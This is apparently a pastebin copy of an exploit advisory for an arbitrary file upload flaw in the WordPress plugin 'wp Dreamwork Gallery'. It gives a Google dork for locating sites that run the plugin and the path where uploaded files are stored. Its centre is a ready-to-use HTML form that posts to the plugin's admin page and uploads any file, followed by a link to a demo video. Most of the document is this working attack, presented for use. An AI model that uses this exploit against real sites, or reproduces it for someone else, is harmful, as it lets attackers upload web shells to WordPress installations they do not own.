SHOW:
|
|
- or go back to the newest paste.
1 | <!-- | |
2 | ||
3 | ||
4 | \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____ | |
5 | \ \ / /| | '__| | | / __|\ /| | | |_ / | |
6 | \ V / | | | | |_| \__ \/ \| |_| |/ / | |
7 | \_/ |_|_| \__,_|___/_/\_\____//___| | |
8 | ||
9 | --> | |
10 | ######################################################### | |
11 | # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery | |
12 | # Contact: FB: Abdou MjCodez Tw: VirusXDz | |
13 | # Category: webapps | |
14 | # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ | |
15 | ######################################################## | |
16 | ||
17 | ||
18 | ||
19 | # Proof of Concept | |
20 | ||
21 | the uploaded file will be located in the directory | |
22 | ||
23 | Example : [(7)_uploadfolder] | |
24 | /wp-content/uploads/dreamwork/7_uploadfolder/big/ | |
25 | ||
26 | ||
27 | <html> | |
28 | <body> | |
29 | <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> | |
30 | <input type="hidden" name="task" value="drm_add_new_album" /> | |
31 | <input type="hidden" name="album_name" value="Arbitrary File Upload" /> | |
32 | <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> | |
33 | <input type="file" name="album_img" value="" /> | |
34 | <input type="submit" value="Submit" /> | |
35 | </form> | |
36 | </body> | |
37 | </html> | |
38 | ||
39 | Video : | |
40 | https://youtu.be/_7uAkAzlFrY | |
41 | ||
42 | Bye |